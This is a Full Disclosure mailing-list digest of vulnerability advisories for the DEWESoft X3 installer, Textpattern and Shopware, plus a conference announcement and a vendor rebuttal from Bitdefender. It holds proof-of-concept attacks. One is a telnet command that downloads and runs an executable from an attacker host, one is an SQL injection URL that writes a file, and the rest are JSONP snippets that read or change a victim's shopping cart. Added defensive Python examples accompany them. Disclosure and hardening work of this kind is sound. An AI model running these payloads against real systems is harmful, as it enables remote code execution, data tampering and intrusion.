[FD] hardwear.io CFP is Open & New Security Training in Berlin!

2018-03-13 Thread Yuliya Pliavaka
Greetings from hardwear.io!

We would like to share a few exciting updates that you can expect from
hardwear.io in 2018!

First of all, we are very proud to announce that hardwear.io is going to
hold its first Security Training in Berlin!

Dates: 26 – 27 April 2018

Venue: Novotel Am Tiergarten, Berlin, Germany

Hardware Security Trainings:

-  Practical IOT Hacking by Aseem Jakhar

-  Low-Level Hardware Reversing by Javier-Vazquez Vidal & Ferdinand

-  Side-Channel Attacks 101 by Lejla Batina & Kostas Papagiannopoulos

-  Practical Car Hacking by Guillaume Heilles

Registration is open. Pre-con prices are available till 31st March 2018.


Hardwear.io Conference & Training 2018 will traditionally take place in The
Hague, for the 4th time! Mark your calendars:

Training: 11-12 September

Conference: 13-14 September

Venue: NH Hotels, The Hague, the Netherlands


hardwear.io 2018 Call For Papers is Open till 9th May 2018! Get your
research ready for another successful year!

Best Regards,

Yuliya Pliavaka
Mob. +91-7720825835 / Linkedin
www.hardwear.io  Hardware Security Conference
www.nullcon.net  Nullcon Information Security Conference
www.payatu.com   Payatu Technologies

___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

[FD] DEWESoft X3 SP1 (64-bit) installer / Remote Internal Command Access - CVE-2018-7756

2018-03-13 Thread hyp3rlinx
[+] Credits: John Page (aka hyp3rlinx)
[+] Website: hyp3rlinx.altervista.org
[+] Source:
http://hyp3rlinx.altervista.org/advisories/DEWESOFT-X3-REMOTE-INTERNAL-COMMAND-ACCESS.txt
[+] ISR: Apparition Security



Vendor:
=======
www.dewesoft.com


Product:
========
DEWESoft X3 SP1 (64-bit) installer - X3
DEWESoft_FULL_X3_SP1_64BIT.exe



Vulnerability Type:
===================
Remote Internal Command Access



CVE Reference:
==============
CVE-2018-7756



Security Issue:
===============
The installer for DEWESoft X3 SP1 (64-bit) devices, specifically its
"RunExeFile.exe" component, does not require authentication for sessions on
TCP port 1999. This allows remote attackers to execute arbitrary code or
access internal commands, as demonstrated by a RUN command that can launch an
.EXE file located at an arbitrary directory location, download an .EXE from an
external URL, or run a "SETFIREWALL Off" command.

The RunExeFile.exe "Launcher" is located at "C:\Program Files (x86)\Common
Files\DEWESoft Shared\" after installing using the full-install.

Internal commands used by "RunExeFile.exe", for which I could not find any
documentation:

RUN 
RUNEX 
GETFIREWALL
SETFIREWALL Off
KILL 
USERNAME
SHUTDOWN
SENDKEYS
LIST
DWPIPE

Exploit/POC:
============
TELNET x.x.x.x 1999
RUN calc.exe

OR

Launch the victim's browser and send it to a website for a drive-by download,
etc.

TELNET x.x.x.x 1999
RUN http://ATTACKER-IP/DOOM.exe

Then, from the TELNET session, execute it from the Downloads directory.

runexe c:\Users\victim\Downloads\DOOM.exe
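An inventory check for this exposure, added here as an example; it is not the advisory author's PoC and not DEWESoft code. It connects to TCP/1999, sends one of the read-only commands from the list above with no credentials, and reports whether the service answers, which is the condition CVE-2018-7756 describes. It refuses to send RUN, RUNEX, KILL, SHUTDOWN, SETFIREWALL or SENDKEYS, so it cannot launch, kill or reconfigure anything on the target. CRLF line framing is an assumption, the advisory documents no reply format (so any bytes returned are reported raw), and the stub listener at the bottom is a constructed stand-in so the probe can be run offline; it is not a model of the real protocol.

```python
"""Inventory check for hosts exposing the RunExeFile.exe listener on TCP/1999.

Added example, not part of the advisory or of DEWESoft's software.
Assumptions: commands are ASCII lines terminated by CRLF and the service
answers on the same connection; the reply format is undocumented, so the
raw bytes are reported. Only read-only commands are ever sent.
"""
import socket
import sys
import threading

DEFAULT_PORT = 1999
# Read-only verbs from the advisory's command list; every other verb there
# (RUN, RUNEX, KILL, SHUTDOWN, SETFIREWALL, SENDKEYS) changes state on the host.
SAFE_COMMANDS = {"GETFIREWALL", "USERNAME", "LIST"}


def is_safe_command(command):
    """True only for a bare read-only verb with no arguments."""
    parts = command.strip().split()
    return len(parts) == 1 and parts[0].upper() in SAFE_COMMANDS


def probe(host, port=DEFAULT_PORT, command="GETFIREWALL", timeout=3.0):
    """Connect, send one read-only command with no credentials, collect the reply."""
    if not is_safe_command(command):
        raise ValueError(f"refusing to send {command!r}; only {sorted(SAFE_COMMANDS)} are allowed")
    result = {"host": host, "port": port, "reachable": False, "response": b"", "error": None}
    try:
        with socket.create_connection((host, port), timeout=timeout) as sock:
            result["reachable"] = True
            sock.settimeout(timeout)
            sock.sendall(command.encode("ascii") + b"\r\n")  # CRLF framing is an assumption
            chunks, total = [], 0
            try:
                while total < 4096:
                    data = sock.recv(1024)
                    if not data:
                        break
                    chunks.append(data)
                    total += len(data)
            except socket.timeout:
                pass  # a silent listener is still reported as reachable
            result["response"] = b"".join(chunks)
    except OSError as exc:
        result["error"] = str(exc)
    return result


def answers_without_auth(result):
    """The advisory's condition: connection accepted and a command answered
    without any credential exchange."""
    return bool(result["reachable"] and result["response"])


class ConstructedStub:
    """Constructed stand-in listener so the probe can be exercised offline.
    It echoes 'OK <verb>' and is NOT a model of DEWESoft's real protocol."""

    def __init__(self):
        self._srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        self._srv.bind(("127.0.0.1", 0))
        self._srv.listen(1)
        self.port = self._srv.getsockname()[1]
        threading.Thread(target=self._serve, daemon=True).start()

    def _serve(self):
        conn, _ = self._srv.accept()
        with conn:
            verb = conn.recv(1024).split(b"\r\n")[0].upper()
            conn.sendall(b"OK " + verb + b"\r\n")
        self._srv.close()


def selfcheck():
    """Run the probe against the constructed stub and return the probe result."""
    stub = ConstructedStub()
    return probe("127.0.0.1", stub.port, timeout=2.0)


if __name__ == "__main__":
    for host in sys.argv[1:] or ["127.0.0.1"]:
        r = probe(host)
        flag = "EXPOSED" if answers_without_auth(r) else "ok"
        print(f"{host}:{r['port']} {flag} reachable={r['reachable']} "
              f"reply={r['response']!r} err={r['error']}")
```

Run it with host names or addresses as arguments. A host that answers GETFIREWALL on 1999 with no handshake matches the advisory's condition; since the vendor closed the ticket without a fix, the practical mitigation is a host or network firewall rule that limits inbound TCP/1999 to the installer's own management network.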


Network Access:
===============
Remote



Severity:
=========
High



Disclosure Timeline:
====================
Vendor Notification: February 9, 2018
Vendor "thank you for the warning. We will forward this to the developers
and they will look into it" : February 19, 2018
Inform vendor of disclosure timeline : February 19, 2018
No further replies, updates or addressing of the issue by the vendor.
Vendor "We will assume that this issue is resolved and close the ticket." :
March 6, 2018
March 10, 2018 : Public Disclosure



[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no
warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory,
provided that it is not altered except by reformatting it, and
that due credit is given. Permission is explicitly given for insertion in
vulnerability databases and similar, provided that due credit
is given to the author. The author is not responsible for any misuse of the
information contained herein and accepts no responsibility
for any damage caused by the use or misuse of this information. The author
prohibits any malicious use of security related information
or exploits by the author or elsewhere. All content (c).

hyp3rlinx



[FD] SQL Injection in Textpattern <= 4.6.2

2018-03-13 Thread Manuel Garcia Cardenas
=============================================================
MGC ALERT 2018-002
- Original release date: February 12, 2018
- Last revised:  March 12, 2018
- Discovered by: Manuel García Cárdenas
- Severity: 7.1/10 (CVSS Base Score)
- CVE-ID: CVE-2018-7474
=============================================================

I. VULNERABILITY
-
SQL Injection in Textpattern <= 4.6.2

II. BACKGROUND
-
Textpattern is a free and open-source content management system (CMS) based
on PHP and MySQL, originally developed by Dean Allen and now developed by
Team Textpattern.

III. DESCRIPTION
-
This bug was found while using the portal authenticated as administrator.

To exploit the vulnerability it is only necessary to use version 1.0 of the
HTTP protocol when interacting with the application.

It is possible to inject SQL code through the variable "qty" on the page
"index.php".

IV. PROOF OF CONCEPT
-
The following URL and parameters have been confirmed to suffer from SQL
injection.

/textpattern/textpattern/index.php?event=link&step=link_change_pageby&qty=50&_txp_token=baa07ba857d3618ef810b725b9d4d9d8

Note: the variable "_txp_token" does not work as an anti-CSRF token.

POC:

/textpattern/textpattern/index.php?event=link&step=link_change_pageby&qty=50%20into%20outfile%20'%5cfakesite.com%5c'%3b%20--%20&_txp_token=baa07ba857d3618ef810b725b9d4d9d8

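An added example, not Textpattern's code, showing with sqlite3 why the value of "qty" must be validated and bound rather than concatenated into the query. The table, the query text and the place where the value lands (a LIMIT clause, which is what a page-size setting feeds) are assumptions for illustration, since the vulnerable PHP is not on the page; the payload is the PoC's query string above, URL-decoded. sqlite3 has no INTO OUTFILE, so here the injected text ends in a syntax error, whereas MySQL, which Textpattern uses, accepts INTO OUTFILE after LIMIT when the database account holds the FILE privilege and secure_file_priv allows the path.

```python
"""Concatenated 'qty' versus validated-and-bound 'qty', demonstrated on sqlite3.

Added example, not Textpattern's code. Table, query text and the LIMIT
placement are assumptions; the payload is the advisory's PoC, URL-decoded.
"""
import re
import sqlite3
from urllib.parse import parse_qs

# Constructed copy of the query part of the advisory's PoC URL.
POC_QUERY = (
    "event=link&step=link_change_pageby"
    "&qty=50%20into%20outfile%20'%5cfakesite.com%5c'%3b%20--%20"
    "&_txp_token=baa07ba857d3618ef810b725b9d4d9d8"
)
MAX_PAGEBY = 999


def qty_from_query(query):
    """The qty value as server-side code sees it after URL decoding."""
    return parse_qs(query, keep_blank_values=True).get("qty", [""])[0]


def vulnerable_sql(qty):
    """String concatenation: everything after the digits becomes SQL.
    On MySQL '... LIMIT 50 into outfile ...' is a legal file-writing statement."""
    return "SELECT id, linkname, url FROM txp_link ORDER BY id LIMIT " + str(qty)


def parse_pageby(raw):
    """Hardened: accept only a plain decimal integer within bounds, else raise."""
    text = str(raw).strip()
    if not re.fullmatch(r"[0-9]{1,3}", text):
        raise ValueError(f"pageby must be a positive integer, got {text!r}")
    value = int(text)
    if not 1 <= value <= MAX_PAGEBY:
        raise ValueError(f"pageby {value} out of range 1..{MAX_PAGEBY}")
    return value


def hardened_query(conn, raw):
    """Validate, then bind: the value can only ever be a number, never SQL."""
    return conn.execute(
        "SELECT id, linkname, url FROM txp_link ORDER BY id LIMIT ?",
        (parse_pageby(raw),),
    ).fetchall()


def constructed_db():
    """In-memory table standing in for txp_link; contents are made up."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(
        "CREATE TABLE txp_link(id INTEGER PRIMARY KEY, linkname TEXT, url TEXT);"
        "INSERT INTO txp_link(linkname, url) VALUES"
        " ('one','https://example.org/1'),('two','https://example.org/2'),"
        " ('three','https://example.org/3');"
    )
    return conn


def demo():
    """Run the PoC value through both code paths and report what happened."""
    conn = constructed_db()
    qty = qty_from_query(POC_QUERY)
    out = {"qty": qty, "vulnerable_sql": vulnerable_sql(qty)}
    # sqlite3 rejects 'into' after LIMIT, so the concatenated version fails to
    # parse here; the point is that attacker text reached the SQL parser at all.
    try:
        conn.execute(out["vulnerable_sql"])
        out["vulnerable_error"] = None
    except sqlite3.Error as exc:
        out["vulnerable_error"] = str(exc)
    try:
        hardened_query(conn, qty)
        out["hardened_rejected"] = False
    except ValueError:
        out["hardened_rejected"] = True
    out["legit_rows"] = hardened_query(conn, "2")  # a normal page size still works
    return out


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value!r}")
```

The integer check is the whole fix: a page size is never anything but a small positive number, so rejecting everything else at the edge removes the injection regardless of how the query is built, and binding the parameter keeps it that way if the query is later edited.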
V. BUSINESS IMPACT
-
Public defacement, confidential data leakage, and database server
compromise can result from these attacks. Client systems can also be
targeted, and complete compromise of these client systems is also possible.

VI. SYSTEMS AFFECTED
-
Textpattern <= 4.6.2

VII. SOLUTION
-
Disable website until a fix is available.

VIII. REFERENCES
-
https://textpattern.com/

IX. CREDITS
-
This vulnerability has been discovered and reported
by Manuel García Cárdenas (advidsec (at) gmail (dot) com).

X. REVISION HISTORY
-
February 12, 2018 1: Initial release
March 12, 2018 2: Revision to send to lists

XI. DISCLOSURE TIMELINE
-
February 12, 2018 1: Vulnerability acquired by Manuel Garcia Cardenas
February 12, 2018 2: Sent to vendor, no response
February 26, 2018 3: Second email to vendor, no response
March 12, 2018 4: Sent to the Full-Disclosure list

XII. LEGAL NOTICES
-
The information contained within this advisory is supplied "as-is" with no
warranties or guarantees of fitness of use or otherwise.

XIII. ABOUT
-
Manuel Garcia Cardenas
Pentester


Re: [FD] BitDefender Total Security 2018 - Insecure Pipe Permissions

2018-03-13 Thread Alex BALAN
Hello,

Allow me to fix this for you:

> On 6 Mar 2018, at 20:04, filipe  wrote:
> 
> =[ Timeline of disclosure
> ]===
> 
> 01/24/2018 - Vendor was informed of the vulnerability.
> 01/29/2018 - Vendor did not respond.

01/25/2018 - We replied notifying you that we’ve opened a ticket with the 
relevant team
01/26/2018 - We asked for a working PoC
01/31/2018 - You replied with a theoretical “PoC” (no code, just a few steps 
which didn’t really help, sadly)
02/01/2018 - We replied asking for a script, a piece of code, a video, anything 
that backs up your claim since we didn’t reproduce it based on the steps you 
provided.
02/12/2018 - We notified you that we closed the ticket since you stopped 
replying

> 01/24/2018 - CVE assigned [2]
> 03/06/2018 - Advisory publication date.

We take our bugbounty programs very seriously and other than some Nigerian 
princes and fake LinkedIn invites we reply to _all_ reports, valid, invalid or 
incredibly ridiculous alike. As such, you may imagine why, when we saw an 
advisory with our name saying “Vendor did not respond”, the team felt a bit 
disappointed for failing to reply for the first time in a few years. Thankfully 
this was not the case.

If you still believe this is a genuine issue, exploitable in real life and you 
have some evidence to back that up, let us know and we’ll gladly reopen the 
ticket.

Cheers,
—
Alex “Jay” BALAN
Chief Security Researcher
Bitdefender




[FD] PayPal Inc Increases Bug Bounty Payments in 2018 up to 30.000$

2018-03-13 Thread Vulnerability Lab
Title: PayPal Inc Increases Bug Bounty Payments in 2018 up to 30.000$

URL:
https://www.vulnerability-db.com/?q=articles/2018/03/13/paypal-inc-increases-bug-bounty-payments-2018-3

#bugbounty #security #research #infosec

-- 
VULNERABILITY LABORATORY - RESEARCH TEAM
SERVICE: www.vulnerability-lab.com




[FD] PayPal Inc - New Venmo Bug Bounty Program

2018-03-13 Thread Vulnerability Lab
Title: PayPal Inc - New Venmo Bug Bounty Program

URL:
https://www.vulnerability-db.com/?q=articles/2018/02/27/paypal-inc-updates-bug-bounty-program-venmo-payments-services

-- 
VULNERABILITY LABORATORY - RESEARCH TEAM
SERVICE: www.vulnerability-lab.com




[FD] [RT-SA-2017-012] Shopware Cart Accessible by Third-Party Websites

2018-03-13 Thread RedTeam Pentesting GmbH
Advisory: Shopware Cart Accessible by Third-Party Websites

RedTeam Pentesting discovered that the shopping cart implemented by Shopware
offers an insecure API. Malicious, third-party websites may abuse this API to
list, add or remove products from a user's cart.


Details
===

Product: Shopware
Affected Versions: 4.0.1 - 5.3.7
Fixed Versions: > 5.4.0
Vulnerability Type: Cross-Site Request Forgery
Security Risk: low
Vendor URL: https://shopware.com
Vendor Status: fixed version released
Advisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2017-012
Advisory Status: published
CVE: GENERIC-MAP-NOMATCH
CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=GENERIC-MAP-NOMATCH


Introduction
============

"Shopware 5 is the next generation of open source e-commerce software made in
Germany. Based on bleeding edge technologies like Symfony 2, Doctrine 2 & Zend
Framework Shopware comes as the perfect platform for your next e-commerce
project. Furthermore Shopware 5 provides an event-driven plugin system and an
advanced hook system, giving you the ability to customize every part of the
platform."
(from the Shopware GitHub repository [1])


More Details
============

The Shopware web application provides users with a virtual shopping cart to
collect products prior to checkout. This cart is displayed to the user as a
modal sidebar appearing at the right edge of the browser window. Consequently,
Shopware implements several API endpoints to allow JavaScript code to perform
shopping cart operations. These endpoints are implemented in the
"Shopware_Controllers_Frontend_Checkout" class and can be reached through the
following paths:

 * /checkout/ajaxCart
 * /checkout/ajaxAddArticleCart
 * /checkout/ajaxDeleteArticleCart

RedTeam Pentesting discovered that these API endpoints support JSONP when a
URL parameter named "callback" is specified. The origin of calls to the cart
API is not validated, so any third-party website may make use of this API: if
a customer of a Shopware shop visits a malicious, attacker-controlled website,
JavaScript code on that site may access the user's shopping cart.


Proof of Concept
================

The following JavaScript snippets demonstrate how to access the cart of a
Shopware shop at "https://example.net" from a third-party website. The
"getJSON" function of jQuery 3 is used to interface with the JSONP API.

By running the following code, the contents of a cart may be retrieved. The
result of the API call is displayed on the browser's developer console.


$.getJSON("https://example.net/checkout/ajaxCart?callback=?")
  .done(console.log);


The following code adds a new product to the cart. In this case, two instances
of product 1234 are added.


$.getJSON(
  "https://example.net/checkout/ajaxAddArticleCart"+
  "?callback=?&sAdd=1234&sQuantity=2"
).done(console.log);


To remove a product from a user's shopping cart, attackers may use the
following code. An id for the "sDelete" parameter may be obtained through a
prior call to ajaxCart.


$.getJSON(
  "https://example.net/checkout/ajaxDeleteArticleCart"+
  "?callback=?&sDelete=4321"
).done(console.log);



Workaround
==========

Support for JSONP should be removed from the cart AJAX API. This ensures that
only JavaScript code from the same origin may access the API and, respectively,
the cart's contents. Furthermore, operations which change the state of the cart,
i.e. adding and removing products, must be protected with CSRF tokens.

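A model of the two endpoint shapes, added here as an example in Python; it is not Shopware's PHP. The JSONP-enabled handler the advisory describes sits beside one that applies the workaround above: it ignores "callback", answers JSON only, and requires a session-bound token (plus a matching Origin whenever the browser sends one) for ajaxAddArticleCart and ajaxDeleteArticleCart. The paths are the advisory's; the parameter names sAdd, sQuantity and sDelete follow Shopware's front-end cart API; the cart store, session id, X-CSRF-Token header name and the request sequence in demo() are constructed for this example.

```python
"""JSONP-enabled cart endpoint beside a same-origin, CSRF-protected one.

Added example in Python, not Shopware's code. Cart store, session ids and
the token header name are constructed; only the paths and parameter names
follow the advisory.
"""
import hmac
import json
import secrets

SHOP_ORIGIN = "https://example.net"
CARTS = {}        # session id -> list of cart lines (constructed store)
CSRF_TOKENS = {}  # session id -> token bound to that session


def _mutate(cart, path, params):
    """Cart operations shared by both handlers; False for unknown paths."""
    if path == "/checkout/ajaxAddArticleCart":
        line_id = max([c["id"] for c in cart], default=0) + 1
        cart.append({"id": line_id, "article": int(params["sAdd"]),
                     "quantity": int(params.get("sQuantity", 1))})
    elif path == "/checkout/ajaxDeleteArticleCart":
        cart[:] = [c for c in cart if c["id"] != int(params["sDelete"])]
    elif path != "/checkout/ajaxCart":
        return False
    return True


def jsonp_handler(path, params, session_id):
    """Vulnerable shape: a 'callback' parameter turns the JSON into a script.
    A third-party page loads it via <script src=...> with the victim's cookies,
    its callback receives the cart, and the same GET adds or deletes lines."""
    cart = CARTS.setdefault(session_id, [])
    if not _mutate(cart, path, params):
        return 404, "text/plain", "not found"
    body = json.dumps({"cart": cart})
    callback = params.get("callback")
    if callback:
        return 200, "application/javascript", f"{callback}({body});"
    return 200, "application/json", body


def issue_csrf_token(session_id):
    """Token handed only to the shop's own pages, bound to the session."""
    token = secrets.token_hex(16)
    CSRF_TOKENS[session_id] = token
    return token


def hardened_handler(path, params, headers, session_id):
    """Fixed shape. 'callback' is ignored: a JSON object body is not valid
    JavaScript, so a cross-origin <script> load learns nothing. State-changing
    paths need a session-bound token (and a matching Origin when sent), which
    a third-party page cannot obtain."""
    if path != "/checkout/ajaxCart":
        origin = headers.get("Origin")
        if origin is not None and origin != SHOP_ORIGIN:
            return 403, "application/json", json.dumps({"error": "cross-origin request refused"})
        expected = CSRF_TOKENS.get(session_id, "")
        supplied = headers.get("X-CSRF-Token", "")
        if not expected or not hmac.compare_digest(supplied.encode(), expected.encode()):
            return 403, "application/json", json.dumps({"error": "missing or invalid CSRF token"})
    cart = CARTS.setdefault(session_id, [])
    if not _mutate(cart, path, params):
        return 404, "application/json", json.dumps({"error": "not found"})
    return 200, "application/json", json.dumps({"cart": cart})


def demo():
    """Replays the advisory's PoC requests as a cross-site page would issue them."""
    CARTS.clear()
    CSRF_TOKENS.clear()
    sid = "sess-victim"
    results = {}
    poc_add = {"callback": "leak", "sAdd": "1234", "sQuantity": "2"}
    # Vulnerable: the attacker's 'leak' callback receives the cart; add works untokened.
    jsonp_handler("/checkout/ajaxAddArticleCart", poc_add, sid)
    results["jsonp_read"] = jsonp_handler("/checkout/ajaxCart", {"callback": "leak"}, sid)
    # Hardened: same requests from a third-party origin, no token.
    attacker = {"Origin": "https://attacker.example"}
    results["hard_add_blocked"] = hardened_handler("/checkout/ajaxAddArticleCart", poc_add, attacker, sid)
    results["hard_read"] = hardened_handler("/checkout/ajaxCart", {"callback": "leak"}, {}, sid)
    # The shop's own front end: same origin with a session-bound token.
    own = {"Origin": SHOP_ORIGIN, "X-CSRF-Token": issue_csrf_token(sid)}
    results["hard_delete_ok"] = hardened_handler("/checkout/ajaxDeleteArticleCart", {"sDelete": "1"}, own, sid)
    return results


if __name__ == "__main__":
    for name, (status, ctype, body) in demo().items():
        print(f"{name}: {status} {ctype} {body}")
```

Not echoing the callback (and serving `application/json` with `X-Content-Type-Options: nosniff`) is what closes the read; the token is what closes add and delete, because a GET carrying the session cookie can be triggered from any site whether or not JSONP exists. The Origin check is a second layer only: browsers omit Origin on many cross-site GETs, so the handler treats its absence as "unknown", not as "same origin".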

Fix
===

Upgrade to Shopware newer than 5.4.0.


Security Risk
=============

This vulnerability is rated as a low risk. Disclosure of a user's shopping cart
to attackers may negatively impact the user's privacy. Furthermore, competing
eCommerce sites may use this information to improve sales. By adding or
removing products from a user's cart, attackers can negatively impact a user's
shopping experience and create support effort for the shop operator.


Timeline
========

2017-08-28 Vulnerability identified
2017-09-13 Customer approved disclosure to vendor
2017-09-14 Vendor notified
2018-02-27 Vendor released fixed version
2018-03-13 Advisory released


References
==========

[1] https://github.com/shopware/shopware
[2] https://community.shopware.com/Downloads_cat_448.html#5.4.0


RedTeam Pentesting GmbH
=======================

RedTeam Pentesting offers individual penetration tests performed by a
team of specialised IT-security experts. Hereby, security weaknesses in
company networks or products are uncovered and can be fixed immediately.

As there are only few experts in this field, RedTeam